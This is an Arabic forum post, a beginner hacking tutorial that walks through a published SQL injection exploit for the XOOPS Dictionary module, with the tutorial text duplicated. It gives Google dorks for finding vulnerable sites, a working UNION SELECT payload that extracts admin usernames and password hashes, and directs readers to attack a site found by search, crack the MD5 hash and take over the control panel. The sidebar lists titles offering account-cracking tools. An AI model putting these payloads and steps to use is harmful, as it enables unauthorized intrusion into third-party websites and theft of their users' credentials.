تعلم قراءة الثغرات وأختراق المواقع والمنتديات(ادخل مبتدء وأطلع مبدع)
صفحة 1 من اصل 1
تعلم قراءة الثغرات وأختراق المواقع والمنتديات(ادخل مبتدء وأطلع مبدع)
بسم الله الرحمن الرحيم
هذا الدرس يـ اخوان الى المبتدئين
يعني المحترفين ما راح يحتاجو الى هذا الدرس
هذا الدرس فقط يساعدك في فهم ومعرفة الثغرات المكتوبه وطريقة الإستفاده منها
الان
نروح الى احد مواقع الثغرات الكثيره
وانا اخترت الميل ورم لانه اسهل واحد
نفتح الصفحة الرئيسيه للموقع
milw0rm - exploits : vulnerabilities : videos : papers : shellcode
الي يهمنا في هذي الصفحة هو اختراق المواقع بما ان حنى مبتدئين
الا هي
ثالث خيار
الي لونهم بـ الاصفر
هذول جدد بـ تاريخ اليوم
والي لونهم اخضر يعني اقدم
وطبعا التاريخ مكتوب على جنب
انا بختار وحدة من الثغرات الموجوده
و اخترت هذي الثغره
XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability
مكتوب فيها كـ التالي
كود:
##########################################
#
# XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
#
####MAİL : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
#
###########################################
#
# DORK 1 : allinurl: "modules/dictionary"
#
# DORK 2 : allinurl: "modules/dictionary/print.php?id"
#
###########################################
EXPLOIT :
modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
###########################################
Dictionary Version 0.94 by nagl.ch
Dictionary Version 0.91 by nagl.ch
Dictionary Version 0.70 by nagl.ch
###########################################
##################S@BUN####################
###########################################
#####hackturkiye.hackturkiye@gmail.com#####
###########################################
# milw0rm.com [2008-03-17]
طيب نشرح شوي شوي
الجزاء الاول
كود:
XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
هذي معلومات عن الثغره
نوعيتها و وين الثغره موجوده و في اي اصدار
طيب
الثغره هذي في سكريبت اسمه XOOPS
وهذي مجله طبعا
على اية حال الثغره في dictionary
الا هو الدليل
والاصدارات هي
0.94-0.91-0.70
والبيانات الي بتجي هذي غير مهمه بـ النسبه لنا
وهي معلومات عن مكتشف الثغره
كود:
#
##AUTHOR : S@BUN
#
####HOME : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
#
####MAİL : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
#
###########################################
والان اهم جزئين
الجزاء الاول الدورك
###########################################
كود:
#
# DORK 1 : allinurl: "modules/dictionary"
#
# DORK 2 : allinurl: "modules/dictionary/print.php?id"
#
شنو هذا الدورك
هذي الكلمه الي راح تحطها في كلمة البحث عشان تجيب لك المواقع المصابه بـ الثغره
فـ لو كتبت في قوقل
كود:
allinurl: "modules/dictionary"
راح يطلع لك كل المواقع الي موجود فيها هذا
على اية حال
نختار موقع من المواقع
وانا اخترت
كود:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
نروح الى الجزاء الثاني المهم
الا وهو
كود:
###########################################
EXPLOIT :
modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
###########################################
وهذا كود الإستغلال
يعني راح ننسخ هذا الكود ونحطه في الموقع الي اخترناه
وراح يصير رابط الموقع مع الاستغلال كذا
كود:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
/*
فورا راح يطلع لنا اليوزر والباسوورد لمدير الموقع
طبعا الموضوع ما ينتهي هنا
الباسوورد مشفر بـ الـ MD5
والـ MD5 هذا نوع من انوع التشفير وهو نوعا ما
لكن البرامج ما قصرت و تقدرو بـ اي برنامج فك باسووردات MD5 انكم تفكو الهاش الي يطلع لكم
على اية حال الان الباسوورد طلع لنا مشفر مع الاسم
يعني الباسوورد مشفر والاسم موجود جنبه
وهم كذا
ARC-753: a19010808cc277ac5cc50548d7a61e8e
الي بـ الون الاحمر هذا الباسوورد المشفر
والي بـ الازرق هذا اسم مدير الموقع الي راح تدخل به لوحة التحكم بعد ما تفك التشفير
النقطتين الرئسيتين فقط لتفريق بينهم
بعد ما تفك باسوورد الموقع
تدخل لوحة تحكم الموقع وتسوي الي يعجبك
يعني المحترفين ما راح يحتاجو الى هذا الدرس
هذا الدرس فقط يساعدك في فهم ومعرفة الثغرات المكتوبه وطريقة الإستفاده منها
الان
نروح الى احد مواقع الثغرات الكثيره
وانا اخترت الميل ورم لانه اسهل واحد
نفتح الصفحة الرئيسيه للموقع
milw0rm - exploits : vulnerabilities : videos : papers : shellcode
الي يهمنا في هذي الصفحة هو اختراق المواقع بما ان حنى مبتدئين
الا هي
ثالث خيار
الي لونهم بـ الاصفر
هذول جدد بـ تاريخ اليوم
والي لونهم اخضر يعني اقدم
وطبعا التاريخ مكتوب على جنب
انا بختار وحدة من الثغرات الموجوده
و اخترت هذي الثغره
XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability
مكتوب فيها كـ التالي
كود:
##########################################
#
# XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
#
####MAİL : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
#
###########################################
#
# DORK 1 : allinurl: "modules/dictionary"
#
# DORK 2 : allinurl: "modules/dictionary/print.php?id"
#
###########################################
EXPLOIT :
modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
###########################################
Dictionary Version 0.94 by nagl.ch
Dictionary Version 0.91 by nagl.ch
Dictionary Version 0.70 by nagl.ch
###########################################
##################S@BUN####################
###########################################
#####hackturkiye.hackturkiye@gmail.com#####
###########################################
# milw0rm.com [2008-03-17]
طيب نشرح شوي شوي
الجزاء الاول
كود:
XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
هذي معلومات عن الثغره
نوعيتها و وين الثغره موجوده و في اي اصدار
طيب
الثغره هذي في سكريبت اسمه XOOPS
وهذي مجله طبعا
على اية حال الثغره في dictionary
الا هو الدليل
والاصدارات هي
0.94-0.91-0.70
والبيانات الي بتجي هذي غير مهمه بـ النسبه لنا
وهي معلومات عن مكتشف الثغره
كود:
#
##AUTHOR : S@BUN
#
####HOME : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
#
####MAİL : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
#
###########################################
والان اهم جزئين
الجزاء الاول الدورك
###########################################
كود:
#
# DORK 1 : allinurl: "modules/dictionary"
#
# DORK 2 : allinurl: "modules/dictionary/print.php?id"
#
شنو هذا الدورك
هذي الكلمه الي راح تحطها في كلمة البحث عشان تجيب لك المواقع المصابه بـ الثغره
فـ لو كتبت في قوقل
كود:
allinurl: "modules/dictionary"
راح يطلع لك كل المواقع الي موجود فيها هذا
على اية حال
نختار موقع من المواقع
وانا اخترت
كود:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
نروح الى الجزاء الثاني المهم
الا وهو
كود:
###########################################
EXPLOIT :
modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
###########################################
وهذا كود الإستغلال
يعني راح ننسخ هذا الكود ونحطه في الموقع الي اخترناه
وراح يصير رابط الموقع مع الاستغلال كذا
كود:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
/*
فورا راح يطلع لنا اليوزر والباسوورد لمدير الموقع
طبعا الموضوع ما ينتهي هنا
الباسوورد مشفر بـ الـ MD5
والـ MD5 هذا نوع من انوع التشفير وهو نوعا ما
لكن البرامج ما قصرت و تقدرو بـ اي برنامج فك باسووردات MD5 انكم تفكو الهاش الي يطلع لكم
على اية حال الان الباسوورد طلع لنا مشفر مع الاسم
يعني الباسوورد مشفر والاسم موجود جنبه
وهم كذا
ARC-753: a19010808cc277ac5cc50548d7a61e8e
الي بـ الون الاحمر هذا الباسوورد المشفر
والي بـ الازرق هذا اسم مدير الموقع الي راح تدخل به لوحة التحكم بعد ما تفك التشفير
النقطتين الرئسيتين فقط لتفريق بينهم
بعد ما تفك باسوورد الموقع
تدخل لوحة تحكم الموقع وتسوي الي يعجبك
مواضيع مماثلة
» المواقع الاباحية..
» البرنامج الشهير لفتح المواقع المحجوبة Ultra surf 10.06
» هل تعلم ؟ هل تعلم أن ...
» كتاب تعلم لغة البرمجة جافا JAVA
» تعلم صيانة الجوال من خلال هذا الكتاب.
» البرنامج الشهير لفتح المواقع المحجوبة Ultra surf 10.06
» هل تعلم ؟ هل تعلم أن ...
» كتاب تعلم لغة البرمجة جافا JAVA
» تعلم صيانة الجوال من خلال هذا الكتاب.
صفحة 1 من اصل 1
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى
الثلاثاء ديسمبر 24, 2013 3:13 pm من طرف pdhk
» برنامج Check Password لتهكير وسرقة نكات ميج33
الثلاثاء نوفمبر 05, 2013 10:51 am من طرف alnmr
» البرنامج الرائع syriasun برنامج جديد بميزات رائعة
الجمعة مايو 17, 2013 7:36 pm من طرف vip
» برنامج تهكير نكات عن طريق التجريب السريع
الجمعة مايو 10, 2013 5:20 pm من طرف Moaala
» امتلك بوت بفوت 6 رومات مجانا عن طريق كمبيوترك
الخميس مايو 09, 2013 5:57 am من طرف jsmart.eu
» برنامج هكر نكات ميغ33 وتجريب اكثر من 60000 باسوورد
الأحد أبريل 07, 2013 8:48 pm من طرف خليلو
» ملفات بوت عربي جديد بلا منافسة arabic bot
الأحد يناير 27, 2013 9:27 am من طرف vip
» سرفر بوتات مجاني جديد تفضلو شبيه بالمأجور
الأحد يناير 27, 2013 9:18 am من طرف vip
» اصنع بوت خاص بك وبيدخل روم واحد
الخميس يناير 17, 2013 6:45 am من طرف al-cont
» برنامج كشف ارقام النكات السورية مجانا
الأربعاء نوفمبر 14, 2012 10:01 am من طرف the-save
» حصريا ادخل وفعل بروكسي خاص فيك متل المأجور بس مجاني
الجمعة أكتوبر 26, 2012 9:26 am من طرف alnemer5
» اسرار الهكر للسيرياتوك والجابر
الخميس سبتمبر 27, 2012 2:25 am من طرف sam...
» شروط وقوانين الاشراف في المنتديات والاقسام ادخلوا لتنضمو لاسرة المنتدى
الإثنين أغسطس 27, 2012 10:41 am من طرف vip
» شرح برنامج رفع بوتات البايثون
الإثنين أغسطس 27, 2012 9:51 am من طرف vip
» ثغرة حلووووه وسهلة لحقو حالكن .., امتداد ملف passwd.txt
الإثنين أغسطس 20, 2012 6:20 pm من طرف sare-soft